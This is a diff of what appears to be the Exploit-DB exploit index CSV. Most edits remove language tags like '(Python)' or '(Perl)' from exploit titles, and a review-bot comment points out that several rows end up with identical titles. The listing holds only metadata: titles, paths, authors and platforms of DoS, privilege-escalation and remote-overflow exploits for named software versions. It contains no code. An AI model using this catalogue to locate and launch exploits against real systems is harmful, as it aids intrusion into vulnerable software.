 15248,exploits/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",dos,windows,
 15250,exploits/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,dos,windows,
 15263,exploits/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",dos,windows,
-15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure (Python)",2010-10-16,ZoRLu,dos,aix,
+15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure",2010-10-16,ZoRLu,dos,aix,
 15257,exploits/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows,
 15258,exploits/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows,
 15259,exploits/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",dos,windows,
@@ -2461,8 +2461,8 @@ id,file,description,date,author,type,platform,port
 20311,exploits/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,dos,windows,
 20323,exploits/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",dos,hardware,
 20328,exploits/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",dos,hardware,
-20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,dos,hardware,
-20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (Perl)",1998-03-17,Rootshell,dos,hardware,
+20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-16,Rootshell,dos,hardware,
+20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-17,Rootshell,dos,hardware,
 20336,exploits/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",dos,multiple,
 43153,exploits/windows/dos/43153.js,"Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check",2017-11-16,"Google Security Research",dos,windows,
 20373,exploits/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,dos,hp-ux,
@@ -4369,7 +4369,7 @@ id,file,description,date,author,type,platform,port
 34521,exploits/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service",2010-08-20,"Shane Bester",dos,linux,
 34522,exploits/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service",2010-07-09,"Elena Stepanova",dos,linux,
 34530,exploits/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",dos,windows,
-34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",dos,windows,
+34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-09-05,"Robert Kugler",dos,windows,
 34588,exploits/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,dos,aix,
 34603,exploits/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,dos,windows,
 34602,exploits/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",dos,windows,
@@ -6807,7 +6807,7 @@ id,file,description,date,author,type,platform,port
 180,exploits/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,local,linux,
 182,exploits/linux/local/182.sh,"RedHat 6.2 - '/sbin/restore' Local Privilege Escalation",2000-11-16,anonymous,local,linux,
 183,exploits/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,local,linux,
-184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl)",2000-11-16,Tlabs,local,linux,
+184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation",2000-11-16,Tlabs,local,linux,
 186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux,
 193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux,
 197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris,
@@ -6914,7 +6914,7 @@ id,file,description,date,author,type,platform,port
 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple,
 657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux,
 669,exploits/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,local,linux,
-680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",local,osx,
+680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2004-12-08,"Jonathan Bringhurst",local,osx,
 684,exploits/linux/local/684.c,"TipxD 1.1.1 - Not SETUID Local Format String",2004-12-14,CoKi,local,linux,
 694,exploits/windows/local/694.c,"WinRAR 3.4.1 - Corrupt '.ZIP' File",2004-12-16,"Vafa Khoshaein",local,windows,
 695,exploits/linux/local/695.c,"Cscope 15.5 - Symlink",2004-12-17,Gangstuck,local,linux,
@@ -6942,7 +6942,7 @@ id,file,description,date,author,type,platform,port
 791,exploits/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",local,linux,
 792,exploits/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",local,linux,
 793,exploits/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,local,osx,
-795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,local,osx,
+795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2005-02-07,0xdeadbabe,local,osx,
 796,exploits/linux/local/796.sh,"Exim 4.42 - Local Privilege Escalation",2005-02-07,darkeagle,local,linux,
 798,exploits/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,local,windows,
 803,exploits/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,local,windows,
@@ -6993,7 +6993,7 @@ id,file,description,date,author,type,platform,port
 971,exploits/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation",2005-04-29,"Jerome Athias",local,windows,
 972,exploits/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",local,solaris,
 973,exploits/linux/local/973.c,"ARPUS/Ce - Local File Overwrite (setuid)",2005-05-01,"Kevin Finisterre",local,linux,
-974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",local,linux,
+974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid)",2005-05-01,"Kevin Finisterre",local,linux,
 997,exploits/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Privilege Escalation",2005-05-17,newbug,local,linux,
 1001,exploits/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,local,aix,
 1009,exploits/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,local,linux,
@@ -7047,7 +7047,7 @@ id,file,description,date,author,type,platform,port
 1406,exploits/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,local,windows,
 1407,exploits/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)",2006-01-05,SoBeIt,local,windows,
 1412,exploits/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,local,linux,
-1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,local,linux,
+1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow",2006-01-13,Qnix,local,linux,
 1425,exploits/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,local,linux,
 1445,exploits/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",local,linux,
 1449,exploits/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",local,linux,
@@ -7377,7 +7377,7 @@ id,file,description,date,author,type,platform,port
 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,
 7533,exploits/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Local Privilege Escalation",2008-12-21,"NT Internals",local,windows,
 7536,exploits/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,local,windows,
-7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,local,windows,
+7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-22,Encrypt3d.M!nd,local,windows,
 7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple,
 7577,exploits/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,local,windows,
 7581,exploits/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Local Privilege Escalation",2008-12-28,"Don Bailey",local,freebsd,
@@ -7409,8 +7409,8 @@ id,file,description,date,author,type,platform,port
 7745,exploits/windows/local/7745.py,"VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,local,windows,
 7765,exploits/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,local,windows,
 7839,exploits/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,local,windows,
-7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,local,windows,
-7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,local,windows,
+7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,SimO-s0fT,local,windows,
+7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,AlpHaNiX,local,windows,
 7853,exploits/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,local,windows,
 7855,exploits/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux,
 7856,exploits/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux,
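Review bot: Rows 7843 and 7848 end up with the identical description `Browser3D 3.5 - '.sfs' Local Stack Overflow`, so a title search, or any tooling that keys on the description, can only tell them apart by file extension or author. The same collision appears in later hunks for 10782/10787, 1997/2017, 3474/3482 and 5622/5720. The index already separates same-title entries with a numeric suffix (the NewsReactor rows end in `(1)` and `(2)`), so these could become `... Local Stack Overflow (1)` and `... Local Stack Overflow (2)` instead of losing their only distinguishing tag.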
@@ -7520,7 +7520,7 @@ id,file,description,date,author,type,platform,port
 8657,exploits/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,local,windows,
 8660,exploits/windows/local/8660.pl,"CastRipper 2.50.70 - '.m3u' Local Buffer Overflow",2009-05-12,[0]x80->[H]4x²0r,local,windows,
 8661,exploits/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,local,windows,
-8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",local,windows,
+8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,"Super Cristal",local,windows,
 8663,exploits/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,local,windows,
 8670,exploits/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz' Directory Traversal",2009-05-13,Nine:Situations:Group,local,windows,
 8673,exploits/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation",2009-05-13,s0m3b0dy,local,linux,
@@ -7573,7 +7573,7 @@ id,file,description,date,author,type,platform,port
 9229,exploits/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,local,windows,
 9234,exploits/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",local,windows,
 40297,exploits/windows/local/40297.py,"NScan 0.9.1 - 'Target' Local Buffer Overflow",2016-08-29,hyp3rlinx,local,windows,
-9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python)",2009-07-27,Dr_IDE,local,windows,
+9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation",2009-07-27,Dr_IDE,local,windows,
 9286,exploits/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,local,windows,
 9291,exploits/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,local,windows,
 9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows,
@@ -7754,9 +7754,9 @@ id,file,description,date,author,type,platform,port
 10747,exploits/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow",2009-12-27,dijital1,local,windows,
 10748,exploits/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Local Buffer Overflow (Metasploit)",2009-12-27,dijital1,local,windows,
 10759,exploits/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow",2009-12-28,corelanc0d3r,local,windows,
-10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,local,windows,
-10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows,
-10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows,
+10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows,
+10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow",2009-12-29,jacky,local,windows,
+10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows,
 10797,exploits/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,local,windows,
 10827,exploits/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)",2009-12-30,"Sébastien Duquette",local,windows,
 10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows,
@@ -9458,7 +9458,7 @@ id,file,description,date,author,type,platform,port
 27874,exploits/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",local,windows,
 27938,exploits/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,local,linux,
 27944,exploits/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,local,osx,
-27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",local,osx,
+27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation",2013-08-30,"David Kennedy (ReL1K)",local,osx,
 28084,exploits/windows/local/28084.html,"KingView 6.53 - 'SuperGrid' Insecure ActiveX Control",2013-09-04,blake,local,windows,
 28130,exploits/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL (Metasploit)",2013-09-06,Metasploit,local,windows,
 28287,exploits/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,local,linux,
@@ -9726,7 +9726,7 @@ id,file,description,date,author,type,platform,port
 35395,exploits/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",local,windows,
 35423,exploits/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS 13.1.4 - Local Privilege Escalation",2014-12-02,"Information Paradox",local,windows,
 35440,exploits/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation (Metasploit)",2014-12-02,Metasploit,local,osx,
-35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",local,windows,
+35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)",2014-12-03,"Muhamad Fadzil Ramli",local,windows,
 35450,exploits/linux/local/35450.txt,"VFU 4.10-1.1 - Local Buffer Overflow",2014-12-03,"Juan Sacco",local,linux,
 35472,exploits/linux_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",local,linux_x86-64,
 35488,exploits/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",local,osx,
@@ -10018,7 +10018,7 @@ id,file,description,date,author,type,platform,port
 39791,exploits/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execution (Metasploit)",2016-05-09,Metasploit,local,multiple,
 39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows,
 39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",local,windows,
-39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,local,windows,
+39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032)",2016-04-25,fdiskyou,local,windows,
 39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Overflow",2016-05-13,"Juan Sacco",local,linux,
 39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,local,linux,
 39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,
@@ -11134,7 +11134,7 @@ id,file,description,date,author,type,platform,port
 48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
 48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
 48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
-48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows,
+48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH) (ROP)",2020-03-30,Hodorsec,local,windows,
 48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
@@ -11144,7 +11144,7 @@ id,file,description,date,author,type,platform,port
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
 48314,exploits/windows_x86/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows_x86,
-48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
+48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter)",2020-04-14,"Andy Bowden",local,windows,
 48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
 48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
@@ -11180,7 +11180,7 @@ id,file,description,date,author,type,platform,port
 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
 48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
-48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
+48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH) (ASLR + DEP Bypass)",2020-06-10,boku,local,windows,
 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
@@ -11715,9 +11715,9 @@ id,file,description,date,author,type,platform,port
 1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)",2006-06-15,c0rrupt,remote,windows,
 1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445
 1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445
-1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000
+1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-09,joffer,remote,multiple,10000
 2014,exploits/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",remote,windows,515
-2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,remote,multiple,10000
+2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-15,UmZ,remote,multiple,10000
 2034,exploits/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",remote,hardware,
 2047,exploits/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",remote,windows,
 2048,exploits/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution",2006-07-20,"Jon Hart",remote,hardware,
@@ -11757,7 +11757,7 @@ id,file,description,date,author,type,platform,port
 2403,exploits/windows/remote/2403.c,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow",2006-09-20,nop,remote,windows,
 2408,exploits/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",remote,windows,
 2425,exploits/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow",2006-09-24,jamikazu,remote,windows,
-2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",remote,windows,
+2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)",2006-09-25,"Trirat Puttaraksa",remote,windows,
 2440,exploits/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",remote,windows,
 2445,exploits/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow",2006-09-27,h07,remote,windows,80
 2448,exploits/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (HTML)",2006-09-28,jamikazu,remote,windows,
@@ -11787,7 +11787,7 @@ id,file,description,date,author,type,platform,port
 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,
 2789,exploits/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,remote,windows,
 2800,exploits/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",remote,windows,
-2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",remote,windows,445
+2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)",2006-11-18,"Winny Thomas",remote,windows,445
 2837,exploits/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",remote,multiple,
 2856,exploits/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",remote,linux,21
 2858,exploits/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow",2006-11-28,K-sPecial,remote,linux,
@@ -11854,7 +11854,7 @@ id,file,description,date,author,type,platform,port
 3378,exploits/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,remote,multiple,
